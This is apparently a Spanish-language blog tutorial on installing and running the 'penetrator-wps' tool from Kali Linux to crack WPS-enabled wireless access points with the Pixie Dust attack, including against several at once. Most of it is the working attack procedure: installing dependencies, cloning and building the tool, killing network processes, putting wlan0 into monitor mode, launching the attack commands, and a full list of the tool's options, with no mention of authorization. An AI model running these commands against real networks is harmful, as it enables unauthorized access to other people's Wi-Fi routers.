Ataque WPS desde Kali Linux 2016.1

Esta es una herramienta experimental que es capaz de atacar múltiples puntos de acceso inalámbrico compatible con WPS en tiempo real. Utiliza el ataque de polvo mágico cada vez que recibe el mensaje M3, a menos que se desactiva con -P de polvo mágico requiere pixiewps que se instalen.

La herramienta básicamente se llama “Penetrator-wps” y antes de empezar la instalación tenemos que instalar algo importante para su instalación de la herramienta.

 apt-get install libpcap-dev libssl-dev

Ahora vamos a seleccionar donde vamos a colocar la herramienta en mi caso en Escritorio

 git clone https://github.com/xXx-stalin-666-money-xXx/penetrator-wps.git
 cd penetrator-wps

Instalación

 ./install.sh

Para vamos proceder hacer el ataque.

Screenshot from 2016-02-29 23-24-34

 airmon-ng check kill
ifconfig
Para ver cual es nuestra conexión a la red en mi caso wlan0
 airmon-ng start wlan0

Veremos cual es la conexión con wlan0 en mi caso es wlan0mon

Screenshot from 2016-02-29 23-29-00
De todo este procedimiento no tendremos conexión a Internet para hacer el procedimiento.
Ahora vamos a ejecutar el programa.

 penetrator -i wlan0mon -A
 penetrator -i wlan0mon -c 1
 penetrator -i wlan0mon -A -M

cmd options

-h Display help
-i Set monitor mode device to use
-s Scan for WPS enabled APs
-c Set channel(s)
-e Set ESSID for next target specified with -b
-b Set target(s)
-A Scan for WPS APs and try pixiedust on all of them;
-M Disable attacking multiple APs at once (only -A)
-P Disable pixiewps after M3 is received
-D Disable loading sessions – starts new
-W Wait after every PIN attempt
-v verbose – print info about WPS messages etc
-vv verbose level 2 – print pixiewps data
-t Set time limit for scanning (default 10)
-T Set timeout – when it occurs, resend last packet (default 1)
-R Set maximum resends (default 5)\n”);
-S Sleep after 10 failures in a row (default 60)
-N Ignore NACKs (debug)

Espero haberte ayudado y comiences a probar esta herramienta. No te olvides en pasar a mi canal de “YOUTUBE”